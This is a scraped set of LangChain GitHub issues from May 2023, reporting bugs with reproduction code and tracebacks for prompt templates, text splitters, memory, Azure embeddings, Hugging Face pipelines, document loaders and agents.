LengthBasedExampleSelector import json # create our examples examples = [ { "query": "my text number 1", "answer": """{"person": "Jack", "Location": "France"}""" }, { "query": "my text number 2", "answer": """{"person": "James", "Location": "Portugal"}""" } ] # create a example template example_template = """ User: {query} AI: {answer} """ # create a prompt example from above template example_prompt = PromptTemplate( input_variables=["query", "answer"], template=example_template ) # now break our previous prompt into a prefix and suffix # the prefix is our instructions task_description = f""" Context for the task """ # and the suffix our user input and output indicator instruction = """ User: {query} AI: """ # now create the few shot prompt template few_shot_prompt_template = FewShotPromptTemplate( examples=examples, example_prompt=example_prompt, prefix=task_description, suffix=instruction, input_variables=["query"], example_separator="\n\n" ) print(few_shot_prompt_template.format(query="My awesome query")) ''' ### Expected behavior It would be expected to output a prompt with several examples in which the answer was a JSON string: """ User: My text number 1 AI: {"person": "Jack", "Location": "France"} User: My text number 2 AI: {"person": "James", "Location": "Portugal"} User: My new input text AI: """
FewShotPromptTemplate bug on examples with JSON strings
https://api.github.com/repos/langchain-ai/langchain/issues/4367/comments
7
2023-05-08T23:29:13Z
2024-07-08T10:32:17Z
https://github.com/langchain-ai/langchain/issues/4367
1,701,078,306
4,367
[ "langchain-ai", "langchain" ]
### System Info langchain v0.0.162 python3.10 ### Who can help? @hwchase17 I believe issue was introduced here: https://github.com/hwchase17/langchain/pull/2963 This works when calling `__init__` directly, but the model_name is not passed to `__init__` when using `from_tiktoken_encoder()` ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` print(TokenTextSplitter()._tokenizer) # <Encoding 'gpt2'> print(TokenTextSplitter(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> print(TokenTextSplitter.from_tiktoken_encoder(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'gpt2'> ``` ### Expected behavior ``` print(TokenTextSplitter()._tokenizer) # <Encoding 'gpt2'> print(TokenTextSplitter(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> print(TokenTextSplitter.from_tiktoken_encoder(model_name="gpt-3.5-turbo")._tokenizer) # <Encoding 'cl100k_base'> ```
TokenTextSplitter ignores model_name when using from_tiktoken_encoder
https://api.github.com/repos/langchain-ai/langchain/issues/4357/comments
0
2023-05-08T19:47:49Z
2023-05-08T23:36:41Z
https://github.com/langchain-ai/langchain/issues/4357
1,700,828,804
4,357
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi, I'm creating a pdf chatbot with memory and the chain I use is ConversationalRetrievalChain + ConversationBufferMemory, but it seems that it can only remember some chat history. Does anyone have an idea of the reason? It works well on a question like `can you summarize the answer?`, but it cannot remember the first question I asked, ```python query = "Hi, what is my first question?" result = qa({"question": query}) print(result['answer']) ``` ``` I'm sorry, but I don't have access to that information as our conversation history is not stored. Is there anything else I can help you with? ``` Here is my code: ```python def get_chat_history(inputs) -> str: res = [] for human, ai in inputs: res.append(f"Human:{human}\nAI:{ai}") return "\n".join(res) memory = ConversationBufferMemory( memory_key='chat_history', return_messages=True, output_key='answer') # Create conversation chain that uses our vectordb as retriver, this also allows for chat history management qa = ConversationalRetrievalChain.from_llm(ChatOpenAI(temperature=0,model_name='gpt-3.5-turbo'), db.as_retriever(),memory=memory, get_chat_history=get_chat_history, return_source_documents=True) ``` ### Suggestion: _No response_
ConversationalRetrievalChain + Memory: Can only remember partial memory
https://api.github.com/repos/langchain-ai/langchain/issues/4355/comments
3
2023-05-08T19:34:53Z
2023-11-26T16:09:44Z
https://github.com/langchain-ai/langchain/issues/4355
1,700,812,707
4,355
[ "langchain-ai", "langchain" ]
### System Info (.venv) C:\Users\hbb9279\OpenAI\Files\10K\2019>python Python 3.11.3 (tags/v3.11.3:f3909b8, Apr 4 2023, 23:49:59) [MSC v.1934 64 bit (AMD64)] on win32 Type "help", "copyright", "credits" or "license" for more information. >>> langchain-0.0.162 import os import openai openai.api_type = "azure" openai.api_base = "https://<<deployment_id>>.openai.azure.com/" openai.api_version = "2023-03-15-preview" vectorstore = FAISS.from_documents(documents=documents, embedding = emb ) emb = OpenAIEmbeddings(chunk_size=1) openai.api_base, openai.api_version ('https://<<deployment_id>>.openai.azure.com/', '2022-12-01') Then when you try to use the functionality, it will fail with resource not found. because the api_version with 2022-12-01 doesn't include the GPT-35-Turbo and GPT-4 😐 ### Who can help? @hwchase17 @vowelparrot @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os import openai openai.api_type = "azure" openai.api_version = "2023-03-15-preview" emb = OpenAIEmbeddings(chunk_size=1) openai.api_version >> '2022-12-01' ### Expected behavior The expectation is to keep the environmental variable the same way that I defined them without modifying them.
Azure OpenAIEmbeddings(chunk_size=1) is changing the API version of the openai
https://api.github.com/repos/langchain-ai/langchain/issues/4352/comments
8
2023-05-08T18:08:59Z
2023-09-06T21:03:28Z
https://github.com/langchain-ai/langchain/issues/4352
1,700,692,794
4,352
[ "langchain-ai", "langchain" ]
### System Info Latest langchain version. ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ValueError: Loading mosaicml/mpt-7b-chat requires you to execute the configuration file in that repo on your local machine. Make sure you have read the code there to avoid malicious use, then set the option `trust_remote_code=True` to remove this error. Adding `trust_remote_code":True` to model_kwargs allows you to download the models throws TypeError: transformers.pipelines.base.infer_framework_load_model() got multiple values for keyword argument 'trust_remote_code' later on after the download. lang_chain8.py ``` from langchain import HuggingFacePipeline llm = HuggingFacePipeline.from_model_id(model_id="mosaicml/mpt-7b-chat", task="text-generation", model_kwargs={"temperature":0.1, "trust_remote_code":True}) from langchain import PromptTemplate, LLMChain template = """Question: {question} Answer: Let's think step by step.""" prompt = PromptTemplate(template=template, input_variables=["question"]) llm_chain = LLMChain(prompt=prompt, llm=llm) question = "What is electroencephalography?" print(llm_chain.run(question)) ``` ``` python lang_chain8.py Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [01:07<00:00, 33.72s/it] Traceback (most recent call last): File "/Users/russellballestrini/git/flaskchat/lang_chain8.py", line 4, in <module> llm = HuggingFacePipeline.from_model_id(model_id="mosaicml/mpt-7b-chat", task="text-generation", model_kwargs={"temperature":0.1, "trust_remote_code": True}) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/Users/russellballestrini/git/flaskchat/env/lib/python3.11/site-packages/langchain/llms/huggingface_pipeline.py", line 118, in from_model_id pipeline = hf_pipeline( ^^^^^^^^^^^^ File "/Users/russellballestrini/git/flaskchat/env/lib/python3.11/site-packages/transformers/pipelines/__init__.py", line 779, in pipeline framework, model = infer_framework_load_model( ^^^^^^^^^^^^^^^^^^^^^^^^^^^ TypeError: transformers.pipelines.base.infer_framework_load_model() got multiple values for keyword argument 'trust_remote_code' ``` ### Expected behavior I expect to be able to run inference on any huggingface model even the untrusted ones.
HuggingFacePipeline trust_remote_code:True allows download but not inference
https://api.github.com/repos/langchain-ai/langchain/issues/4351/comments
6
2023-05-08T18:01:54Z
2023-09-22T16:09:25Z
https://github.com/langchain-ai/langchain/issues/4351
1,700,680,363
4,351
[ "langchain-ai", "langchain" ]
### System Info When specifying a materialized view in include_tables, the following error occurs: include_tables {'table_name'} not found in database ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction include_tables=['table1', 'table2'] db = SQLDatabase.from_uri("postgresql://xxx:xxx@xxx:5432/xxx", include_tables=include_tables) ### Expected behavior Materialized views should be accessible.
Materialized Views not accessible
https://api.github.com/repos/langchain-ai/langchain/issues/4349/comments
8
2023-05-08T16:51:57Z
2024-07-19T13:43:53Z
https://github.com/langchain-ai/langchain/issues/4349
1,700,590,442
4,349
[ "langchain-ai", "langchain" ]
### Discussed in https://github.com/hwchase17/langchain/discussions/4341 <div type='discussions-op-text'> <sup>Originally posted by **mattia-bolognesi** May 8, 2023</sup> I have a problem when running this script, basically gives an error on the ZeroAgent class: ``` prompt = ZeroShotAgent.create_prompt( tools, prefix=prefix, suffix=suffix, input_variables=["input", "chat_history", "agent_scratchpad"], ) ``` The error is: ``` "ValidationError: 1 validation error for PromptTemplate _root_ Invalid prompt schema; check for mismatched or missing input parameters. {'input', 'agent_scratchpad', 'chat_history'} (type=value_error)". ```</div>
Problem with ZeroShotAgent.create_prompt()
https://api.github.com/repos/langchain-ai/langchain/issues/4345/comments
1
2023-05-08T15:27:44Z
2023-09-10T16:20:07Z
https://github.com/langchain-ai/langchain/issues/4345
1,700,472,614
4,345
[ "langchain-ai", "langchain" ]
### System Info LangChain: 0.0.161 Platform: Ubuntu 22.04.2 LTS Python Version: 3.10.6 When trying to use the new OneDriveLoader, I get the below error. ``` Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/user/.cache/pypoetry/virtualenvs/test-r_fbvPX4-py3.10/lib/python3.10/site-packages/langchain/document_loaders/onedrive.py", line 223, in load account = self._auth() File "/home/user/.cache/pypoetry/virtualenvs/test-r_fbvPX4-py3.10/lib/python3.10/site-packages/langchain/document_loaders/onedrive.py", line 102, in _auth account = Account( NameError: name 'Account' is not defined. Did you mean: 'account'? ``` I believe the issue is with the Account import in onedrive.py, since `Account` is only imported during type checking, so its not available for runtime and your instantiating an `Account` object further down. https://github.com/hwchase17/langchain/blob/16e766376221ee8b514d78ae8c38e273eca30f25/langchain/document_loaders/onedrive.py#L17-L18 https://github.com/hwchase17/langchain/blob/16e766376221ee8b514d78ae8c38e273eca30f25/langchain/document_loaders/onedrive.py#L102-L110 ### Who can help? @hwchase17 / @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction import os from langchain.document_loaders import OneDriveLoader # assume O365_CLIENT_ID / O365_CLIENT_SECRET are also present loader = OneDriveLoader(drive_id=os.getenv('O365_DRIVE_ID')) documents = loader.load() print(documents) ### Expected behavior a list of printed documents
OneDriveLoader: NameError: name 'Account' is not defined. Did you mean: 'account'?
https://api.github.com/repos/langchain-ai/langchain/issues/4343/comments
8
2023-05-08T14:57:18Z
2023-11-13T16:09:26Z
https://github.com/langchain-ai/langchain/issues/4343
1,700,415,939
4,343
[ "langchain-ai", "langchain" ]
### System Info System: Linux Kernel: Linux version 5.15.0-1026-aws (buildd@lcy02-amd64-088) ( gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 ) Python version: 3.8.16 LangChain version: 0.0.157 ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Upon constructing the HuggingFaceEndpoint, when the API token is set as an environment variable (not passing to the constructor), the attribute ```huggingface_api_token``` will always be empty, causing a missing token in the request headers: ``` from dotenv import load_dotenv load_dotenv() llm = HuggingFaceEndpoint( endpoint_url="togethercomputer/RedPajama-INCITE-Instruct-7B-v0.1", task="text-generation" ) print(llm.huggingfacehub_api_token) print("What is the capital of France?") ``` Output: ``` None Traceback (most recent call last): File "research/red_pajama.py", line 58, in <module> print(llm("What is the capital of France?")) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 281, in __call__ self.generate([prompt], stop=stop, callbacks=callbacks) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 176, in generate raise e File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 170, in generate self._generate(prompts, stop=stop, run_manager=run_manager) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/base.py", line 377, in _generate self._call(prompt, stop=stop, run_manager=run_manager) File "/home/ubuntu/miniconda3/envs/marpai_llm/lib/python3.8/site-packages/langchain/llms/huggingface_endpoint.py", line 133, in _call raise ValueError( ValueError: Error raised by inference API: Authorization header is correct, but the token seems invalid ``` ValueError exception raised here: [https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/llms/huggingface_endpoint.py#L118](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/llms/huggingface_endpoint.py#L118) ### Expected behavior huggingFaceEndpoint should send a valid POST request to inference API.
Empty API token in HuggingFaceEndpoint unless explicitly passed to Constructor
https://api.github.com/repos/langchain-ai/langchain/issues/4334/comments
6
2023-05-08T11:48:06Z
2024-02-11T16:20:22Z
https://github.com/langchain-ai/langchain/issues/4334
1,700,100,642
4,334
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi, we frequently encounter breaking issues during development recently due to LangChain daily release. May I ask how do you plan to solve this problem in the future and recommend users to use LangChain with compatibility issues? Thanks! For example, we import CallbackManager like this in langchaine version <=0.0.153 ```from langchain.callbacks.base import CallbackManager``` but in the latest version, the class has been moved to manager.py and break our test, we need update code to ```from langchain.callbacks.manager import CallbackManager``` to fix it ### Suggestion: _No response_
Issue: Compatibility issues with LangChain between different versions
https://api.github.com/repos/langchain-ai/langchain/issues/4332/comments
1
2023-05-08T11:06:34Z
2023-09-19T16:11:47Z
https://github.com/langchain-ai/langchain/issues/4332
1,700,049,036
4,332
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Argument `model_name` is the standard way of defining a model in LangChain's [ChatOpenAI](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/chat_models/openai.py#L115). However, OpenAI uses `model` in their own [API](https://platform.openai.com/docs/api-reference/completions/create). To handle this discrepancy, LangChain transforms `model_name` into `model` [here](https://github.com/hwchase17/langchain/blob/65c95f9fb2b86cf3281f2f3939b37e71f048f741/langchain/chat_models/openai.py#L202). The problem is that, if you ignore model_name and use model in the LLM instantiation e.g. `ChatOpenAI(model=...)`, it still works! It works because model becomes part of `model_kwargs`, which takes precedence over the default `model_name` (which would be "gpt-3.5-turbo"). This leads to an inconsistency: the `model` can be anything (e.g. "gpt-4-0314"), but `model_name` will be the default value. This inconsistency won't cause any direct issue but can be problematic when you're trying to understand what models are actually being called and used. I'm raising this issue because I lost a couple of hours myself trying to understand what was happening. ### Suggestion: There are three ways to solve it: 1. Raise an error or warning if model is used as an argument and suggest using model_name instead 2. Raise a warning if model is defined differently from model_name 3. Change from model_name to model to make it consistent with OpenAI's API I think (3) is unfeasible due to the breaking change, but raising a warning seems low effort and safe enough.
Issue: Model and model_name inconsistency in OpenAI LLMs such as ChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4331/comments
0
2023-05-08T10:49:23Z
2023-05-08T23:37:37Z
https://github.com/langchain-ai/langchain/issues/4331
1,700,026,427
4,331
[ "langchain-ai", "langchain" ]
### System Info Python 3.11.2 Langchain 0.0.161 Debian GNU/Linux 12 (bookworm) ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [X] Async ### Reproduction How does verbosity work? I had my python scripts output verbose information, i mean all that green prompt-text when executing chains. All the constructors of LLMs and Chains have verbose=True in their constructors. But somewhat recently langchains behaviour changed and after doing a `pip install --upgrade langchain` my verbose output completely disappeared. Do you have some sort of changelog or documentation on this? I didn't find any. A small script still produces verbose output. But my project doesn't. I'm not sure what i'm doing differently. EDIT: Maybe i should add that i'm doing async calls. And feeding it my own prompts from a PromptTemplate.from_template("..."). Could be related to any of that?! EDIT2: Where does the green text even come from? I can see the chain calls a StdoutCallbackHandler. This fires and prints "Entering new ConversationChain chain..." as it's supposed to. But how do i debug the missing green text after that? It's not in the on_chain_start()... ### Expected behavior Verbose output is produced when setting verbose=True
Langchain isn't verbose any more [run_manager gets dropped]
https://api.github.com/repos/langchain-ai/langchain/issues/4329/comments
11
2023-05-08T09:43:07Z
2024-03-02T07:54:51Z
https://github.com/langchain-ai/langchain/issues/4329
1,699,909,725
4,329
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Currently, the base URL of Serpapi is been hard coded. While some search services(e.g. Bing, `BING_SEARCH_URL`) are configurable. In some companies, the original can not be allowed to access. We need to use nginx redirect proxy. So we need to make the base URL configurable via env. ### Suggestion: Make serpapi base url configurable via env
Issue: Can not configure serpapi base url via env
https://api.github.com/repos/langchain-ai/langchain/issues/4328/comments
2
2023-05-08T09:27:24Z
2023-05-15T21:25:26Z
https://github.com/langchain-ai/langchain/issues/4328
1,699,888,708
4,328
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hello, While trying to import `from langchain.memory import ConversationBufferMemory` I am getting the error ``` ModuleNotFoundError: No module named 'langchain.memory' Traceback: ``` File "c:\users\aviparna.biswas\appdata\local\programs\python\python37\lib\site-packages\streamlit\runtime\scriptrunner\script_runner.py", line 565, in _run_script exec(code, module.__dict__) File "D:\Python Projects\POC\Radium\Ana\app.py", line 8, in <module> from langchain.memory import ConversationBufferMemory ``` I have already installed langchain and it is showing in my packages.
ModuleNotFoundError: No module named 'langchain.memory'
https://api.github.com/repos/langchain-ai/langchain/issues/4327/comments
10
2023-05-08T08:09:09Z
2024-02-28T16:10:30Z
https://github.com/langchain-ai/langchain/issues/4327
1,699,755,334
4,327
[ "langchain-ai", "langchain" ]
### System Info In langchain 0.0.161, if I call `S3DirectoryLoader(bucket, prefix)` where `prefix` is a "folder name" e.g. "documents/" you get a IsADirectoryError: [Errno 21] Is a directory exception. It looks like the code is doing a filter on the bucket objects and the filter returns the files as well as the folder itself. The S3FileLoader tries to download the folder and that's what causes the exception ``` s3 = boto3.resource("s3") bucket = s3.Bucket(self.bucket) docs = [] for obj in bucket.objects.filter(Prefix=self.prefix): loader = S3FileLoader(self.bucket, obj.key) docs.extend(loader.load()) ``` ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Call S3DirectoryLoader(bucket, prefix) using a prefix that is a directory 2. See the exception being thrown ### Expected behavior The documents inside the folder should be loaded. The folder itself should be ignored.
S3DirectoryLoader throws S3DirectoryLoader exception when prefix is a directory
https://api.github.com/repos/langchain-ai/langchain/issues/4326/comments
7
2023-05-08T08:05:02Z
2024-02-13T16:16:53Z
https://github.com/langchain-ai/langchain/issues/4326
1,699,748,061
4,326
[ "langchain-ai", "langchain" ]
### System Info We are using the below Power BI Agent guide to try to connect to Power BI dashboard. [Power BI Dataset Agent](https://python.langchain.com/en/latest/modules/agents/toolkits/examples/powerbi.html) We are able to connect to OpenAI API but facing issues with the below line of code. `powerbi=PowerBIDataset(dataset_id="<dataset_id>", table_names=['table1', 'table2'], credential=DefaultAzureCredential())` Error: > ConfigError: field "credential" not yet prepared so type is still a ForwardRef, you might need to call PowerBIDataset.update_forward_refs(). We tried searching to solve the issues we no luck so far. Is there any configuration we are missing? Can you share more details, is there any specific configuration or access required on power BI side? thanks in advance... ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Same steps mentioned your official PowerBI Dataset Agent documentation ### Expected behavior We should be able to connect to power BI
Power BI Dataset Agent Issue
https://api.github.com/repos/langchain-ai/langchain/issues/4325/comments
14
2023-05-08T07:57:11Z
2024-01-21T13:11:59Z
https://github.com/langchain-ai/langchain/issues/4325
1,699,733,507
4,325